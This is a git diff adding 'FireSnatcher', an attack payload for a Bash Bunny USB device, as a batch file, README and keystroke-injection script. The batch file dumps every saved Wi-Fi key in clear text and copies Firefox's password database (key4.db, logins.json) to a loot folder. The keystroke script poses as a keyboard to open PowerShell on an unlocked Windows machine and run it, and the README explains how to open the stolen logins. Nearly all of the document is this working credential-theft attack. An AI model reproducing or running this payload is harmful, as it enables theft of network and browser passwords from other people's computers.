diff --git a/payloads/library/credentials/FireSnatcher/FireSnatcher.bat b/payloads/library/credentials/FireSnatcher/FireSnatcher.bat
new file mode 100644
index 00000000..d08c8229
--- /dev/null
+++ b/payloads/library/credentials/FireSnatcher/FireSnatcher.bat
@@ -0,0 +1,6 @@
+mkdir %~dp0\loot\%COMPUTERNAME%
+cd /D %~dp0\loot\%COMPUTERNAME% && netsh wlan export profile key=clear
+C: cd \D %appdata%\mozilla\firefox\profiles\
+cd %appdata%\mozilla\firefox\profiles\*.default-release\
+copy key4.db %~dp0\loot\%COMPUTERNAME%
+copy logins.json %~dp0\loot\%COMPUTERNAME%
\ No newline at end of file
diff --git a/payloads/library/credentials/FireSnatcher/README.md b/payloads/library/credentials/FireSnatcher/README.md
new file mode 100644
index 00000000..1d3b0dd0
--- /dev/null
+++ b/payloads/library/credentials/FireSnatcher/README.md
@@ -0,0 +1,45 @@
+# Title:         FireSnatcher
+# Description:   Copies Wifi Keys, and Firefox Password Databases
+# Author:        KarrotKak3
+# Props:         saintcrossbow & 0iphor13
+# Version:       1.0.2.0 (Work in Progress)
+# Category:      Credentials
+# Target:        Windows (Logged in) 
+# Attackmodes:   HID, Storage
+
+# Full Description
+# ----------------
+#   Attacks an Unlocked Windows Machine
+#  Payload targets:
+#    - All WiFi creds
+#    - Firefox Saved Password Database
+#
+#  PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC
+#    Delays to Allow Powershell Time to Open and to Give Attack time to Run
+
+# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT
+#   %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE
+#     Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins
+
+
+#   KNOWN ISSUES
+#  ---------------
+#  Loot is saved in Payloads/switch#/loot
+
+
+# Files
+# -----
+# - payload.txt: Starts the attack. All configuration contained in this file.
+# - FireSnatcher.bat: Worker that grabs Creds
+
+
+# Setup
+# -----
+# - Place the payload.txt and FireSnatcher.bat in Payload folder
+# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running)
+# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility
+
+**LED meanings**
+- Magenta: Initial setup – about 1 – 3 seconds
+- Single yellow blink: Attack in progress
+- Green rapid flash, then solid, then off: Attack complete
diff --git a/payloads/library/credentials/FireSnatcher/payload.txt b/payloads/library/credentials/FireSnatcher/payload.txt
new file mode 100644
index 00000000..143efd55
--- /dev/null
+++ b/payloads/library/credentials/FireSnatcher/payload.txt
@@ -0,0 +1,78 @@
+# Title:         FireSnatcher
+# Description:   Copies Wifi Keys, and Firefox Password Databases
+# Author:        KarrotKak3
+# Props:         saintcrossbow & 0iphor13
+# Version:       1.0.2.0 (Work in Progress)
+# Category:      Credentials
+# Target:        Windows (Logged in) 
+# Attackmodes:   HID, Storage
+
+# Full Description
+# ----------------
+#   Attacks an Unlocked Windows Machine
+#  Payload targets:
+#    - All WiFi creds
+#    - Firefox Saved Password Database
+#
+#  PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC
+#    Delays to Allow Powershell Time to Open and to Give Attack time to Run
+
+# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT
+#   %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE
+#     Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins
+
+
+#   KNOWN ISSUES
+#  ---------------
+#  Loot is saved in Payloads/switch#/loot
+
+
+# Files
+# -----
+# - payload.txt: Starts the attack. All configuration contained in this file.
+# - FireSnatcher.bat: Worker that grabs Creds
+
+
+# Setup
+# -----
+# - Place the payload.txt and FireSnatcher.bat in Payload folder
+# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running)
+# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility
+
+# LEDs
+# ----
+# Magenta: Initial setup – about 1 – 3 seconds
+# Single yellow blink: Attack in progress
+# Green rapid flash, then solid, then off: Attack complete – Bash Bunny may be removed
+
+# Options
+# -------
+# Name of Bash Bunny volume that appears to Windows (BashBunny is default)
+BB_NAME="BashBunny"
+
+# Setup
+# -----
+LED SETUP
+
+
+# Attack
+# ------
+ATTACKMODE HID STORAGE
+Q DELAY 500
+LED ATTACK
+Q DELAY 100
+Q GUI r
+Q DELAY 100
+Q STRING powershell Start-Process powershell
+Q ENTER
+Q DELAY 7000
+Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\FireSnatcher.bat')"
+Q ENTER
+Q DELAY 8000
+Q STRING EXIT
+Q ENTER
+sync
+LED FINISH
+Q DELAY 1500
+shutdown now
+